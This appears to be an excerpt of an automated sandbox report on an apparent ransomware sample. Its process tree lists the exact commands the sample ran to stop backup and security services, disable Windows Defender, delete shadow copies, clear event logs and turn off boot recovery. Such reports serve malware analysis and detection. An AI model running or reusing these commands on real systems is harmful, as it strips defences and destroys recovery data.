PID 2788 wrote to memory of 3024 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | net.exe
PID 2788 wrote to memory of 3024 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | net.exe
PID 3024 wrote to memory of 2784 | 3024 | net.exe | net1.exe
PID 3024 wrote to memory of 2784 | 3024 | net.exe | net1.exe
PID 2788 wrote to memory of 3904 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | net.exe
PID 2788 wrote to memory of 3904 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | net.exe
PID 3904 wrote to memory of 2756 | 3904 | net.exe | net1.exe
PID 3904 wrote to memory of 2756 | 3904 | net.exe | net1.exe
PID 2788 wrote to memory of 3944 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | net.exe
PID 2788 wrote to memory of 3944 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | net.exe
PID 3944 wrote to memory of 2760 | 3944 | net.exe | net1.exe
PID 3944 wrote to memory of 2760 | 3944 | net.exe | net1.exe
PID 2788 wrote to memory of 1444 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | net.exe
PID 2788 wrote to memory of 1444 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | net.exe
PID 1444 wrote to memory of 512 | 1444 | net.exe | net1.exe
PID 1444 wrote to memory of 512 | 1444 | net.exe | net1.exe
PID 2788 wrote to memory of 1504 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | net.exe
PID 2788 wrote to memory of 1504 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | net.exe
PID 1504 wrote to memory of 3304 | 1504 | net.exe | net1.exe
PID 1504 wrote to memory of 3304 | 1504 | net.exe | net1.exe
PID 2788 wrote to memory of 516 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | net.exe
PID 2788 wrote to memory of 516 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | net.exe
PID 516 wrote to memory of 776 | 516 | net.exe | net1.exe
PID 516 wrote to memory of 776 | 516 | net.exe | net1.exe
PID 2788 wrote to memory of 1328 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | net.exe
PID 2788 wrote to memory of 1328 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | net.exe
PID 1328 wrote to memory of 324 | 1328 | net.exe | net1.exe
PID 1328 wrote to memory of 324 | 1328 | net.exe | net1.exe
PID 2788 wrote to memory of 3876 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | net.exe
PID 2788 wrote to memory of 3876 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | net.exe
PID 3876 wrote to memory of 404 | 3876 | net.exe | net1.exe
PID 3876 wrote to memory of 404 | 3876 | net.exe | net1.exe
PID 2788 wrote to memory of 604 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | sc.exe
PID 2788 wrote to memory of 604 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | sc.exe
PID 2788 wrote to memory of 712 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | sc.exe
PID 2788 wrote to memory of 712 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | sc.exe
PID 2788 wrote to memory of 2864 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | sc.exe
PID 2788 wrote to memory of 2864 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | sc.exe
PID 2788 wrote to memory of 996 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | sc.exe
PID 2788 wrote to memory of 996 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | sc.exe
PID 2788 wrote to memory of 2096 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | sc.exe
PID 2788 wrote to memory of 2096 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | sc.exe
PID 2788 wrote to memory of 1316 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | sc.exe
PID 2788 wrote to memory of 1316 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | sc.exe
PID 2788 wrote to memory of 1396 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | sc.exe
PID 2788 wrote to memory of 1396 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | sc.exe
PID 2788 wrote to memory of 1756 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | sc.exe
PID 2788 wrote to memory of 1756 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | sc.exe
PID 2788 wrote to memory of 3932 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | sc.exe
PID 2788 wrote to memory of 3932 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | sc.exe
PID 2788 wrote to memory of 1900 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | reg.exe
PID 2788 wrote to memory of 1900 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | reg.exe
PID 2788 wrote to memory of 1824 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | reg.exe
PID 2788 wrote to memory of 1824 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | reg.exe
PID 2788 wrote to memory of 2392 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | reg.exe
PID 2788 wrote to memory of 2392 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | reg.exe
PID 2788 wrote to memory of 3652 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | reg.exe
PID 2788 wrote to memory of 3652 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | reg.exe
PID 2788 wrote to memory of 3264 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | reg.exe
PID 2788 wrote to memory of 3264 | 2788 | afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | reg.exe
Processes
-
Process tree (bracketed number = nesting depth; each entry lists image path, command line, behaviour tags, PID):

[1] C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
    "C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe"
    - Modifies extensions of user files
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2788
  [2] C:\Windows\SYSTEM32\net.exe
      net.exe stop "SamSs" /y
      - Suspicious use of WriteProcessMemory
      PID:1872
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "SamSs" /y
        PID:1284
  [2] C:\Windows\SYSTEM32\net.exe
      net.exe stop "SDRSVC" /y
      - Suspicious use of WriteProcessMemory
      PID:3024
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "SDRSVC" /y
        PID:2784
  [2] C:\Windows\SYSTEM32\net.exe
      net.exe stop "SstpSvc" /y
      - Suspicious use of WriteProcessMemory
      PID:3904
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "SstpSvc" /y
        PID:2756
  [2] C:\Windows\SYSTEM32\net.exe
      net.exe stop "UI0Detect" /y
      - Suspicious use of WriteProcessMemory
      PID:3944
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "UI0Detect" /y
        PID:2760
  [2] C:\Windows\SYSTEM32\net.exe
      net.exe stop "vmicvss" /y
      - Suspicious use of WriteProcessMemory
      PID:1444
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "vmicvss" /y
        PID:512
  [2] C:\Windows\SYSTEM32\net.exe
      net.exe stop "VSS" /y
      - Suspicious use of WriteProcessMemory
      PID:1504
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "VSS" /y
        PID:3304
  [2] C:\Windows\SYSTEM32\net.exe
      net.exe stop "wbengine" /y
      - Suspicious use of WriteProcessMemory
      PID:516
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "wbengine" /y
        PID:776
  [2] C:\Windows\SYSTEM32\net.exe
      net.exe stop "WebClient" /y
      - Suspicious use of WriteProcessMemory
      PID:1328
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "WebClient" /y
        PID:324
  [2] C:\Windows\SYSTEM32\net.exe
      net.exe stop "UnistoreSvc_12b50" /y
      - Suspicious use of WriteProcessMemory
      PID:3876
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "UnistoreSvc_12b50" /y
        PID:404
  [2] C:\Windows\SYSTEM32\sc.exe
      sc.exe config "SamSs" start= disabled
      PID:604
  [2] C:\Windows\SYSTEM32\sc.exe
      sc.exe config "SDRSVC" start= disabled
      PID:712
  [2] C:\Windows\SYSTEM32\sc.exe
      sc.exe config "SstpSvc" start= disabled
      PID:2864
  [2] C:\Windows\SYSTEM32\sc.exe
      sc.exe config "UI0Detect" start= disabled
      PID:996
  [2] C:\Windows\SYSTEM32\sc.exe
      sc.exe config "vmicvss" start= disabled
      PID:2096
  [2] C:\Windows\SYSTEM32\sc.exe
      sc.exe config "VSS" start= disabled
      PID:1316
  [2] C:\Windows\SYSTEM32\sc.exe
      sc.exe config "wbengine" start= disabled
      PID:1396
  [2] C:\Windows\SYSTEM32\sc.exe
      sc.exe config "WebClient" start= disabled
      PID:1756
  [2] C:\Windows\SYSTEM32\sc.exe
      sc.exe config "UnistoreSvc_12b50" start= disabled
      PID:3932
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
      PID:1900
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      PID:1824
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      PID:2392
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      PID:3652
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      PID:3264
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      PID:1920
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      PID:1876
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      PID:3564
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      PID:3152
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      PID:2160
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      PID:3916
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      PID:3628
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      PID:3440
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
      PID:1804
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      PID:2724
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      PID:3004
  [2] C:\Windows\SYSTEM32\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      PID:1436
  [2] C:\Windows\SYSTEM32\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      PID:3164
  [2] C:\Windows\SYSTEM32\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      PID:3136
  [2] C:\Windows\SYSTEM32\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      PID:3204
  [2] C:\Windows\SYSTEM32\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      PID:2792
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
      PID:2704
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
      PID:1084
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
      PID:3432
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      - Modifies registry class
      PID:376
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      - Modifies registry class
      PID:824
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      - Modifies registry class
      PID:1064
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      PID:3508
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      PID:1452
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      PID:1740
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      PID:1912
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      - Modifies security service
      PID:3224
  [2] C:\Windows\SYSTEM32\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
      PID:3000
  [2] C:\Windows\SYSTEM32\vssadmin.exe
      vssadmin.exe delete shadows /all /quiet
      - Interacts with shadow copies
      PID:2380
  [2] C:\Windows\SYSTEM32\wevtutil.exe
      wevtutil.exe cl system
      - Suspicious use of AdjustPrivilegeToken
      PID:1420
  [2] C:\Windows\SYSTEM32\wevtutil.exe
      wevtutil.exe cl security
      - Suspicious use of AdjustPrivilegeToken
      PID:2056
  [2] C:\Windows\SYSTEM32\wevtutil.exe
      wevtutil.exe cl application
      - Suspicious use of AdjustPrivilegeToken
      PID:3180
  [2] C:\Windows\System32\Wbem\wmic.exe
      wmic.exe SHADOWCOPY /nointeractive
      - Suspicious use of AdjustPrivilegeToken
      PID:4004
  [2] C:\Windows\System32\Wbem\wmic.exe
      wmic.exe shadowcopy delete
      - Suspicious use of AdjustPrivilegeToken
      PID:2320
  [2] C:\Windows\SYSTEM32\bcdedit.exe
      bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      - Modifies boot configuration data using bcdedit
      PID:2180
  [2] C:\Windows\SYSTEM32\bcdedit.exe
      bcdedit.exe /set {default} recoveryenabled no
      - Modifies boot configuration data using bcdedit
      PID:2348
  [2] C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      PID:2184
    [3] C:\Program Files\Windows Defender\MpCmdRun.exe
        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        - Deletes Windows Defender Definitions
        PID:3304
  [2] C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
      PID:1536
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-MpPreference -DisableIOAVProtection $true
        - Suspicious behavior: EnumeratesProcesses
        PID:1656
  [2] C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
      PID:3632
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-MpPreference -DisableRealtimeMonitoring $true
        - Suspicious behavior: EnumeratesProcesses
        PID:1916
Network
MITRE ATT&CK Enterprise v6
Downloads